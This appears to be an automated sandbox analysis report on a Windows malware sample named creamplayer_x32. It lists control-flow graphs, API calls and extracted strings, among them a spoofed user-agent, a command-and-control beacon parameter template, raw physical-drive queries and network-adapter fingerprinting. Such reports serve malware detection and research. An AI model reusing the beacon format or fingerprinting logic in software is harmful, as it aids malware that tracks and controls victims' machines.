2d45fe0 RtlEnterCriticalSection RtlLeaveCriticalSection 61191->61192 61193 2d51fac _malloc 59 API calls 61192->61193 61194 2d4601c 61193->61194 61195 2d51fac _malloc 59 API calls 61194->61195 61196 2d4602a 61195->61196 61197 2d51fac _malloc 59 API calls 61196->61197 61198 2d46031 61197->61198 61199 2d51fac _malloc 59 API calls 61198->61199 61200 2d46052 QueryPerformanceCounter Sleep 61199->61200 61201 2d51fac _malloc 59 API calls 61200->61201 61202 2d46078 61201->61202 61203 2d51fac _malloc 59 API calls 61202->61203 61231 2d46088 _memset 61203->61231 61204 2d460fb RtlEnterCriticalSection RtlLeaveCriticalSection 61204->61231 61205 2d460f5 Sleep 61205->61204 61206 2d4648f RtlEnterCriticalSection RtlLeaveCriticalSection 61207 2d5133c 66 API calls 61206->61207 61207->61231 61208 2d51fac _malloc 59 API calls 61209 2d46531 RtlEnterCriticalSection RtlLeaveCriticalSection 61208->61209 61209->61231 61210 2d467e8 RtlEnterCriticalSection RtlLeaveCriticalSection 61210->61231 61211 2d45c02 59 API calls 61211->61231 61212 2d5133c 66 API calls 61212->61231 61213 2d51418 _sprintf 84 API calls 61213->61231 61214 2d41ba7 210 API calls 61214->61231 61215 2d4694d RtlEnterCriticalSection 61216 2d4697a RtlLeaveCriticalSection 61215->61216 61215->61231 61218 2d43c67 72 API calls 61216->61218 61217 2d51fac _malloc 59 API calls 61217->61231 61218->61231 61219 2d43d7e 64 API calls 61219->61231 61220 2d47330 89 API calls 61220->61231 61221 2d47ff8 88 API calls 61221->61231 61222 2d51f74 _free 59 API calls 61222->61231 61223 2d473df 71 API calls 61223->61231 61224 2d527b5 _Allocate 60 API calls 61224->61231 61225 2d51850 _swscanf 59 API calls 61225->61231 61226 2d433b2 86 API calls 61226->61231 61227 2d4971a 73 API calls 61227->61231 61228 2d4872c 212 API calls 61228->61231 61229 2d49844 60 API calls 61229->61231 61230 2d525e6 65 API calls _strtok 61230->61231 61231->61204 61231->61205 61231->61206 61231->61208 61231->61210 61231->61211 61231->61212 61231->61213 61231->61214 61231->61215 61231->61216 61231->61217 61231->61219 61231->61220 61231->61221 61231->61222 61231->61223 61231->61224 61231->61225 61231->61226 61231->61227 61231->61228 61231->61229 61231->61230 61231->61231 61232 2d45119 103 API calls 61231->61232 61233 2d4c10c 73 API calls 61231->61233 61234 2d49c04 210 API calls 61231->61234 61235 2d46765 Sleep 61231->61235 61237 2d46760 shared_ptr 61231->61237 61232->61231 61233->61231 61234->61231 61236 2d508f0 GetProcessHeap HeapFree 61235->61236 61236->61237 61237->61231 61237->61235 61238 2d44100 GetProcessHeap HeapFree 61237->61238 61238->61237 61627 401dfe RegCloseKey 61628 40d40b 61627->61628 61240 40d01f RegCreateKeyExA

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 229 2d45e4f-2d460dd RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d442c7 GetTickCount call 2d459fa GetVersionExA call 2d53750 call 2d51fac * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d53750 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d51fac * 4 QueryPerformanceCounter Sleep call 2d51fac * 2 call 2d53750 * 2 274 2d460e1-2d460e3 229->274 275 2d460e5-2d460ea 274->275 276 2d460ec-2d460ee 274->276 279 2d460f5 Sleep 275->279 277 2d460f0 276->277 278 2d460fb-2d46439 RtlEnterCriticalSection RtlLeaveCriticalSection 276->278 277->279 281 2d46455-2d4645f 278->281 282 2d4643b-2d46441 278->282 279->278 281->274 283 2d46465-2d46489 call 2d53750 call 2d4439c 281->283 284 2d46447-2d46454 call 2d4534d 282->284 285 2d46443-2d46445 282->285 283->274 292 2d4648f-2d464ba RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5133c 283->292 284->281 285->281 295 2d46504-2d4651c call 2d5133c 292->295 296 2d464bc-2d464cb call 2d5133c 292->296 301 2d46522-2d46524 295->301 302 2d467c3-2d467d2 call 2d5133c 295->302 296->295 303 2d464cd-2d464dc call 2d5133c 296->303 301->302 305 2d4652a-2d465d5 call 2d51fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53750 * 5 call 2d4439c * 2 301->305 311 2d467d4-2d467d6 302->311 312 2d46817-2d46826 call 2d5133c 302->312 303->295 310 2d464de-2d464ed call 2d5133c 303->310 357 2d465d7-2d465d9 305->357 358 2d46612 305->358 310->295 325 2d464ef-2d464fe call 2d5133c 310->325 311->312 316 2d467d8-2d46812 call 2d53750 RtlEnterCriticalSection RtlLeaveCriticalSection 311->316 323 2d46828-2d46831 call 2d45c02 call 2d45d10 312->323 324 2d4683b-2d4684a call 2d5133c 312->324 316->274 339 2d46836 323->339 324->274 337 2d46850-2d46852 324->337 325->274 325->295 337->274 340 2d46858-2d46871 call 2d4439c 337->340 339->274 340->274 346 2d46877-2d46946 call 2d51418 call 2d41ba7 340->346 355 2d4694d-2d4696e RtlEnterCriticalSection 346->355 356 2d46948 call 2d4143f 346->356 361 2d46970-2d46977 355->361 362 2d4697a-2d469e1 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d47330 355->362 356->355 357->358 363 2d465db-2d465ed call 2d5133c 357->363 359 2d46616-2d46644 call 2d51fac call 2d53750 call 2d4439c 358->359 381 2d46685-2d4668e call 2d51f74 359->381 382 2d46646-2d46655 call 2d525e6 359->382 361->362 383 2d469e7-2d46a29 call 2d4971a 362->383 384 2d46b49-2d46b5d call 2d47ff8 362->384 363->358 370 2d465ef-2d46610 call 2d4439c 363->370 370->359 395 2d46694-2d466ac call 2d527b5 381->395 396 2d467b1-2d467be 381->396 382->381 397 2d46657 382->397 393 2d46b13-2d46b24 call 2d473df 383->393 394 2d46a2f-2d46a36 383->394 384->274 403 2d46b29-2d46b44 call 2d433b2 393->403 399 2d46a39-2d46a3e 394->399 409 2d466ae-2d466b6 call 2d4872c 395->409 410 2d466b8 395->410 396->274 401 2d4665c-2d4666e call 2d51850 397->401 399->399 404 2d46a40-2d46a85 call 2d4971a 399->404 412 2d46670 401->412 413 2d46673-2d46683 call 2d525e6 401->413 403->384 404->393 418 2d46a8b-2d46a91 404->418 411 2d466ba-2d46748 call 2d49844 call 2d43863 call 2d45119 call 2d43863 call 2d49aea call 2d49c04 409->411 410->411 438 2d4674d-2d4675e 411->438 412->413 413->381 413->401 422 2d46a94-2d46a99 418->422 422->422 424 2d46a9b-2d46ad6 call 2d4971a 422->424 424->393 430 2d46ad8-2d46b0c call 2d4c10c 424->430 434 2d46b11-2d46b12 430->434 434->393 439 2d46765-2d46790 Sleep call 2d508f0 438->439 440 2d46760 call 2d4380b 438->440 444 2d46792-2d4679b call 2d44100 439->444 445 2d4679c-2d467aa 439->445 440->439 444->445 445->396 447 2d467ac call 2d4380b 445->447 447->396
                                                                                                    APIs
                                                                                                    • RtlInitializeCriticalSection.NTDLL(02D74FC8), ref: 02D45E83
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D45E9A
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D45EA3
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D45EB2
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D45EB5
                                                                                                    • GetTickCount.KERNEL32 ref: 02D45EC9
                                                                                                      • Part of subcall function 02D459FA: _malloc.LIBCMT ref: 02D45A08
                                                                                                    • GetVersionExA.KERNEL32(02D74E18), ref: 02D45EF6
                                                                                                    • _memset.LIBCMT ref: 02D45F15
                                                                                                    • _malloc.LIBCMT ref: 02D45F22
                                                                                                      • Part of subcall function 02D51FAC: __FF_MSGBANNER.LIBCMT ref: 02D51FC3
                                                                                                      • Part of subcall function 02D51FAC: __NMSG_WRITE.LIBCMT ref: 02D51FCA
                                                                                                      • Part of subcall function 02D51FAC: RtlAllocateHeap.NTDLL(00950000,00000000,00000001), ref: 02D51FEF
                                                                                                    • _malloc.LIBCMT ref: 02D45F32
                                                                                                    • _malloc.LIBCMT ref: 02D45F3D
                                                                                                    • _malloc.LIBCMT ref: 02D45F48
                                                                                                    • _malloc.LIBCMT ref: 02D45F53
                                                                                                    • _malloc.LIBCMT ref: 02D45F5E
                                                                                                    • _malloc.LIBCMT ref: 02D45F69
                                                                                                    • _malloc.LIBCMT ref: 02D45F75
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D45F8C
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45F95
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FA1
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FA4
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FAF
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FB2
                                                                                                    • _memset.LIBCMT ref: 02D45FC2
                                                                                                    • _memset.LIBCMT ref: 02D45FCE
                                                                                                    • _memset.LIBCMT ref: 02D45FDB
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D45FE9
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D45FF6
                                                                                                    • _malloc.LIBCMT ref: 02D46017
                                                                                                    • _malloc.LIBCMT ref: 02D46025
                                                                                                    • _malloc.LIBCMT ref: 02D4602C
                                                                                                    • _malloc.LIBCMT ref: 02D4604D
                                                                                                    • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D46059
                                                                                                    • Sleep.KERNEL32(00000000), ref: 02D46067
                                                                                                    • _malloc.LIBCMT ref: 02D46073
                                                                                                    • _malloc.LIBCMT ref: 02D46083
                                                                                                    • _memset.LIBCMT ref: 02D46098
                                                                                                    • _memset.LIBCMT ref: 02D460A8
                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 02D460F5
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D46100
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D46111
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                                    • API String ID: 1856495841-1038016512
                                                                                                    • Opcode ID: a42ba558af17723f144ac2691f9521e532a1efcc60d37749874782f63b75a1b2
                                                                                                    • Instruction ID: 8015201e039a7718c96c4b5ba9b060b17b7b67584f2ef11b5b8a5d1c782268f3
                                                                                                    • Opcode Fuzzy Hash: a42ba558af17723f144ac2691f9521e532a1efcc60d37749874782f63b75a1b2
                                                                                                    • Instruction Fuzzy Hash: 4B71B371D483509FD711AF74A809B5B7BE8EF86314F540C19F98897380DBB89C588FA2

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1007 2d4e99c-2d4e9bf LoadLibraryA 1008 2d4e9c5-2d4e9d3 GetProcAddress 1007->1008 1009 2d4ea7f-2d4ea86 1007->1009 1010 2d4ea78-2d4ea79 FreeLibrary 1008->1010 1011 2d4e9d9-2d4e9e9 1008->1011 1010->1009 1012 2d4e9eb-2d4e9f7 GetAdaptersInfo 1011->1012 1013 2d4ea2f-2d4ea37 1012->1013 1014 2d4e9f9 1012->1014 1015 2d4ea40-2d4ea45 1013->1015 1016 2d4ea39-2d4ea3f call 2d526cf 1013->1016 1017 2d4e9fb-2d4ea02 1014->1017 1019 2d4ea47-2d4ea4a 1015->1019 1020 2d4ea73-2d4ea77 1015->1020 1016->1015 1021 2d4ea04-2d4ea08 1017->1021 1022 2d4ea0c-2d4ea14 1017->1022 1019->1020 1024 2d4ea4c-2d4ea51 1019->1024 1020->1010 1021->1017 1025 2d4ea0a 1021->1025 1026 2d4ea17-2d4ea1c 1022->1026 1028 2d4ea53-2d4ea5b 1024->1028 1029 2d4ea5e-2d4ea69 call 2d527b5 1024->1029 1025->1013 1026->1026 1027 2d4ea1e-2d4ea2b call 2d4e6eb 1026->1027 1027->1013 1028->1029 1029->1020 1034 2d4ea6b-2d4ea6e 1029->1034 1034->1012
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D4E9B2
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D4E9CB
                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D4E9F0
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 02D4EA79
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                    • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                    • API String ID: 514930453-3114217049
                                                                                                    • Opcode ID: e862ad87501cf158ef5674ede1413c1e88ea30b1dfa99940960edab970033471
                                                                                                    • Instruction ID: 93c1dcef8812cc20badd8f06703bb39441f5ff238a9d15ad92a4b5c2b5a878cd
                                                                                                    • Opcode Fuzzy Hash: e862ad87501cf158ef5674ede1413c1e88ea30b1dfa99940960edab970033471
                                                                                                    • Instruction Fuzzy Hash: C121D271E08219ABDB10DBA8D8846FEBBB8BF05304F1401AAE545F7341DB30DD49CBA4

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1035 2d42b95-2d42baf 1036 2d42bc7-2d42bcb 1035->1036 1037 2d42bb1-2d42bb9 call 2d4fb10 1035->1037 1039 2d42bcd-2d42bd0 1036->1039 1040 2d42bdf 1036->1040 1046 2d42bbf-2d42bc2 1037->1046 1039->1040 1041 2d42bd2-2d42bdd call 2d4fb10 1039->1041 1042 2d42be2-2d42c11 WSASetLastError WSARecv call 2d494fe 1040->1042 1041->1046 1048 2d42c16-2d42c1d 1042->1048 1049 2d42d30 1046->1049 1051 2d42c2c-2d42c32 1048->1051 1052 2d42c1f-2d42c2a call 2d4fb10 1048->1052 1050 2d42d32-2d42d38 1049->1050 1054 2d42c34-2d42c39 call 2d4fb10 1051->1054 1055 2d42c46-2d42c48 1051->1055 1062 2d42c3f-2d42c42 1052->1062 1054->1062 1056 2d42c4f-2d42c60 call 2d4fb10 1055->1056 1057 2d42c4a-2d42c4d 1055->1057 1056->1050 1060 2d42c66-2d42c69 1056->1060 1057->1060 1065 2d42c73-2d42c76 1060->1065 1066 2d42c6b-2d42c6d 1060->1066 1062->1055 1065->1049 1068 2d42c7c-2d42c9a call 2d4fb10 call 2d4166f 1065->1068 1066->1065 1067 2d42d22-2d42d2d call 2d41996 1066->1067 1067->1049 1075 2d42cbc-2d42cfa WSASetLastError select call 2d494fe 1068->1075 1076 2d42c9c-2d42cba call 2d4fb10 call 2d4166f 1068->1076 1081 2d42cfc-2d42d06 call 2d4fb10 1075->1081 1082 2d42d08 1075->1082 1076->1049 1076->1075 1090 2d42d19-2d42d1d 1081->1090 1086 2d42d15-2d42d17 1082->1086 1087 2d42d0a-2d42d12 call 2d4fb10 1082->1087 1086->1049 1086->1090 1087->1086 1090->1042
                                                                                                    APIs
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D42BE4
                                                                                                    • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D42C07
                                                                                                      • Part of subcall function 02D494FE: WSAGetLastError.WS2_32(00000000,?,?,02D42A51), ref: 02D4950C
                                                                                                    • WSASetLastError.WS2_32 ref: 02D42CD3
                                                                                                    • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D42CE7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$Recvselect
                                                                                                    • String ID: 3'
                                                                                                    • API String ID: 886190287-280543908
                                                                                                    • Opcode ID: 264b21af09a733239790b2262472bd2f69a1cf37d9c82169d87500ed4e49971d
                                                                                                    • Instruction ID: bace4f564401669b1b30397ae354399f6128fcec657eac27f7d3d29795eb675f
                                                                                                    • Opcode Fuzzy Hash: 264b21af09a733239790b2262472bd2f69a1cf37d9c82169d87500ed4e49971d
                                                                                                    • Instruction Fuzzy Hash: DB4138B1A083018FD7109F64D9187ABBBE9AF85394F10491EF89987790EF74DD40CBA2

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1092 2d4e898-2d4e8c3 CreateFileA 1093 2d4e994-2d4e99b 1092->1093 1094 2d4e8c9-2d4e8de 1092->1094 1095 2d4e8e1-2d4e903 DeviceIoControl 1094->1095 1096 2d4e905-2d4e90d 1095->1096 1097 2d4e93c-2d4e944 1095->1097 1100 2d4e916-2d4e91b 1096->1100 1101 2d4e90f-2d4e914 1096->1101 1098 2d4e946-2d4e94c call 2d526cf 1097->1098 1099 2d4e94d-2d4e94f 1097->1099 1098->1099 1103 2d4e951-2d4e954 1099->1103 1104 2d4e98a-2d4e993 CloseHandle 1099->1104 1100->1097 1105 2d4e91d-2d4e925 1100->1105 1101->1097 1107 2d4e956-2d4e95f GetLastError 1103->1107 1108 2d4e970-2d4e97d call 2d527b5 1103->1108 1104->1093 1109 2d4e928-2d4e92d 1105->1109 1107->1104 1110 2d4e961-2d4e964 1107->1110 1108->1104 1117 2d4e97f-2d4e985 1108->1117 1109->1109 1112 2d4e92f-2d4e93b call 2d4e6eb 1109->1112 1110->1108 1114 2d4e966-2d4e96d 1110->1114 1112->1097 1114->1108 1117->1095
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D4E8B7
                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D4E8F5
                                                                                                    • GetLastError.KERNEL32 ref: 02D4E956
                                                                                                    • CloseHandle.KERNEL32(?), ref: 02D4E98D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                    • String ID: \\.\PhysicalDrive0
                                                                                                    • API String ID: 4026078076-1180397377
                                                                                                    • Opcode ID: 07c812abed6d9161501077c764cd7757b802675d9e24c90d3358e503d9b60d6d
                                                                                                    • Instruction ID: e999f918a46913139472a97ce0b5332475d57bf1fc4438f45cc4ce59bb8352f5
                                                                                                    • Opcode Fuzzy Hash: 07c812abed6d9161501077c764cd7757b802675d9e24c90d3358e503d9b60d6d
                                                                                                    • Instruction Fuzzy Hash: 6F315C71D00215FBDB24DF94D888BAEBBB8FF05714F24456AE545A7380DBB05E45CBA0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 2d45de3-2d45de8 1 2d45e5e-2d45eb5 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 0->1 2 2d45dea-2d45df4 0->2 4 2d45ebc-2d460dd GetTickCount call 2d459fa GetVersionExA call 2d53750 call 2d51fac * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d53750 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d51fac * 4 QueryPerformanceCounter Sleep call 2d51fac * 2 call 2d53750 * 2 1->4 5 2d45eb7 call 2d442c7 1->5 3 2d45df6-2d45e05 2->3 3->3 6 2d45e07 3->6 53 2d460e1-2d460e3 4->53 5->4 8 2d45e08-2d45e0f 6->8 10 2d45e15-2d45e17 8->10 11 2d45e10-2d45e12 8->11 10->8 13 2d45e19-2d45e1d 10->13 11->10 13->1 54 2d460e5-2d460ea 53->54 55 2d460ec-2d460ee 53->55 58 2d460f5 Sleep 54->58 56 2d460f0 55->56 57 2d460fb-2d46439 RtlEnterCriticalSection RtlLeaveCriticalSection 55->57 56->58 60 2d46455-2d4645f 57->60 61 2d4643b-2d46441 57->61 58->57 60->53 62 2d46465-2d46489 call 2d53750 call 2d4439c 60->62 63 2d46447-2d46454 call 2d4534d 61->63 64 2d46443-2d46445 61->64 62->53 71 2d4648f-2d464ba RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5133c 62->71 63->60 64->60 74 2d46504-2d4651c call 2d5133c 71->74 75 2d464bc-2d464cb call 2d5133c 71->75 80 2d46522-2d46524 74->80 81 2d467c3-2d467d2 call 2d5133c 74->81 75->74 82 2d464cd-2d464dc call 2d5133c 75->82 80->81 84 2d4652a-2d465d5 call 2d51fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53750 * 5 call 2d4439c * 2 80->84 90 2d467d4-2d467d6 81->90 91 2d46817-2d46826 call 2d5133c 81->91 82->74 89 2d464de-2d464ed call 2d5133c 82->89 136 2d465d7-2d465d9 84->136 137 2d46612 84->137 89->74 104 2d464ef-2d464fe call 2d5133c 89->104 90->91 95 2d467d8-2d46812 call 2d53750 RtlEnterCriticalSection RtlLeaveCriticalSection 90->95 102 2d46828-2d46836 call 2d45c02 call 2d45d10 91->102 103 2d4683b-2d4684a call 2d5133c 91->103 95->53 102->53 103->53 116 2d46850-2d46852 103->116 104->53 104->74 116->53 119 2d46858-2d46871 call 2d4439c 116->119 119->53 125 2d46877-2d46946 call 2d51418 call 2d41ba7 119->125 134 2d4694d-2d4696e RtlEnterCriticalSection 125->134 135 2d46948 call 2d4143f 125->135 140 2d46970-2d46977 134->140 141 2d4697a-2d469e1 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d47330 134->141 135->134 136->137 142 2d465db-2d465ed call 2d5133c 136->142 138 2d46616-2d46644 call 2d51fac call 2d53750 call 2d4439c 137->138 160 2d46685-2d4668e call 2d51f74 138->160 161 2d46646-2d46655 call 2d525e6 138->161 140->141 162 2d469e7-2d46a29 call 2d4971a 141->162 163 2d46b49-2d46b5d call 2d47ff8 141->163 142->137 149 2d465ef-2d46610 call 2d4439c 142->149 149->138 174 2d46694-2d466ac call 2d527b5 160->174 175 2d467b1-2d467be 160->175 161->160 176 2d46657 161->176 172 2d46b13-2d46b44 call 2d473df call 2d433b2 162->172 173 2d46a2f-2d46a36 162->173 163->53 172->163 178 2d46a39-2d46a3e 173->178 188 2d466ae-2d466b6 call 2d4872c 174->188 189 2d466b8 174->189 175->53 180 2d4665c-2d4666e call 2d51850 176->180 178->178 183 2d46a40-2d46a85 call 2d4971a 178->183 191 2d46670 180->191 192 2d46673-2d46683 call 2d525e6 180->192 183->172 197 2d46a8b-2d46a91 183->197 190 2d466ba-2d4675e call 2d49844 call 2d43863 call 2d45119 call 2d43863 call 2d49aea call 2d49c04 188->190 189->190 218 2d46765-2d46790 Sleep call 2d508f0 190->218 219 2d46760 call 2d4380b 190->219 191->192 192->160 192->180 201 2d46a94-2d46a99 197->201 201->201 203 2d46a9b-2d46ad6 call 2d4971a 201->203 203->172 209 2d46ad8-2d46b12 call 2d4c10c 203->209 209->172 223 2d46792-2d4679b call 2d44100 218->223 224 2d4679c-2d467aa 218->224 219->218 223->224 224->175 226 2d467ac call 2d4380b 224->226 226->175
                                                                                                    APIs
                                                                                                    • RtlInitializeCriticalSection.NTDLL(02D74FC8), ref: 02D45E83
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D45E9A
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D45EA3
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D45EB2
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D45EB5
                                                                                                    • GetTickCount.KERNEL32 ref: 02D45EC9
                                                                                                    • GetVersionExA.KERNEL32(02D74E18), ref: 02D45EF6
                                                                                                    • _memset.LIBCMT ref: 02D45F15
                                                                                                    • _malloc.LIBCMT ref: 02D45F22
                                                                                                    • _malloc.LIBCMT ref: 02D45F32
                                                                                                    • _malloc.LIBCMT ref: 02D45F3D
                                                                                                    • _malloc.LIBCMT ref: 02D45F48
                                                                                                    • _malloc.LIBCMT ref: 02D45F53
                                                                                                    • _malloc.LIBCMT ref: 02D45F5E
                                                                                                    • _malloc.LIBCMT ref: 02D45F69
                                                                                                    • _malloc.LIBCMT ref: 02D45F75
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D45F8C
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45F95
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FA1
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FA4
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FAF
                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FB2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion_memset
                                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                                    • API String ID: 3007647348-1038016512
                                                                                                    • Opcode ID: b81f328acbeb46dcc005e384f011f5c2a2683c7fb82436d9a82aafd793dfd7bb
                                                                                                    • Instruction ID: 5bb5fa7aab3c7dd02311edc45382eb183d9b3e447d6a8716474da662d5fed441
                                                                                                    • Opcode Fuzzy Hash: b81f328acbeb46dcc005e384f011f5c2a2683c7fb82436d9a82aafd793dfd7bb
                                                                                                    • Instruction Fuzzy Hash: 9481C272C483509FD711AF74A848B5B7BE4EF95304F540C1AF98897381EBB89C59CBA2

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 450 2d45e21-2d45e22 451 2d45e24-2d45e2b 450->451 452 2d45e9d-2d45eb5 GetProcAddress GetModuleHandleA GetProcAddress 450->452 453 2d45e2d-2d45e4e 451->453 454 2d45e1f 451->454 455 2d45ebc-2d460dd GetTickCount call 2d459fa GetVersionExA call 2d53750 call 2d51fac * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d53750 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d51fac * 4 QueryPerformanceCounter Sleep call 2d51fac * 2 call 2d53750 * 2 452->455 456 2d45eb7 call 2d442c7 452->456 454->450 499 2d460e1-2d460e3 455->499 456->455 500 2d460e5-2d460ea 499->500 501 2d460ec-2d460ee 499->501 504 2d460f5 Sleep 500->504 502 2d460f0 501->502 503 2d460fb-2d46439 RtlEnterCriticalSection RtlLeaveCriticalSection 501->503 502->504 506 2d46455-2d4645f 503->506 507 2d4643b-2d46441 503->507 504->503 506->499 508 2d46465-2d46489 call 2d53750 call 2d4439c 506->508 509 2d46447-2d46454 call 2d4534d 507->509 510 2d46443-2d46445 507->510 508->499 517 2d4648f-2d464ba RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5133c 508->517 509->506 510->506 520 2d46504-2d4651c call 2d5133c 517->520 521 2d464bc-2d464cb call 2d5133c 517->521 526 2d46522-2d46524 520->526 527 2d467c3-2d467d2 call 2d5133c 520->527 521->520 528 2d464cd-2d464dc call 2d5133c 521->528 526->527 530 2d4652a-2d465d5 call 2d51fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53750 * 5 call 2d4439c * 2 526->530 536 2d467d4-2d467d6 527->536 537 2d46817-2d46826 call 2d5133c 527->537 528->520 535 2d464de-2d464ed call 2d5133c 528->535 582 2d465d7-2d465d9 530->582 583 2d46612 530->583 535->520 550 2d464ef-2d464fe call 2d5133c 535->550 536->537 541 2d467d8-2d46812 call 2d53750 RtlEnterCriticalSection RtlLeaveCriticalSection 536->541 548 2d46828-2d46836 call 2d45c02 call 2d45d10 